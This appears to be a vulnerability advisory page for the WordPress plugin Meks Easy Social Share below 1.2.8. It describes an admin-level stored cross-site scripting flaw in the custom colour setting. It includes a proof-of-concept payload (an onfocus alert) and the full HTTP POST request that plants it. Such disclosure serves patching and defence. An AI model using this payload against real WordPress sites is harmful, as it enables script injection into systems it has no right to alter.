Lucene search

K
wpexploitAsif Nawaz MinhasWPEX-ID:9DEC8AC7-BEFD-4C9D-9A9E-7DA9E395DBF2
HistorySep 26, 2022 - 12:00 a.m.

Meks Easy Social Share < 1.2.8 - Admin+ Stored Cross-Site Scripting

2022-09-2600:00:00
Asif Nawaz Minhas
93
stored cross-site scripting
xss
admin+ interception
security exploit
meks easy social share

EPSS

0.001

Percentile

24.8%

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

Intercept the request made when saving the settings and put the following payload in the meks_ess_settings[color][custom_color] parameter: %23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f

POST /wp-admin/options.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 634
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

option_page=meks-ess-settings&action=update&_wpnonce=5d8e1580fd&meks_ess_settings%5Bplatforms%5D%5B%5D=facebook&meks_ess_settings%5Bplatforms%5D%5B%5D=twitter&meks_ess_settings%5Bstyle%5D=1&meks_ess_settings%5Bvariant%5D=1&meks_ess_settings%5Bcolor%5D%5Btype%5D=brand&meks_ess_settings%5Bcolor%5D%5Bcustom_color%5D=%23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f&&meks_ess_settings%5Blocation%5D=above&meks_ess_settings%5Bpost_type%5D%5B%5D=post&meks_ess_settings%5Blabel_share%5D%5Btext%5D=Share+this&meks_ess_settings%5Blabel_share%5D%5Bactive%5D=0&meks_ess_settings%5Blabel_share%5D%5Bactive%5D=1&submit=Save+Changes

The XSS will be triggered when viewing the settings again

EPSS

0.001

Percentile

24.8%

Related for WPEX-ID:9DEC8AC7-BEFD-4C9D-9A9E-7DA9E395DBF2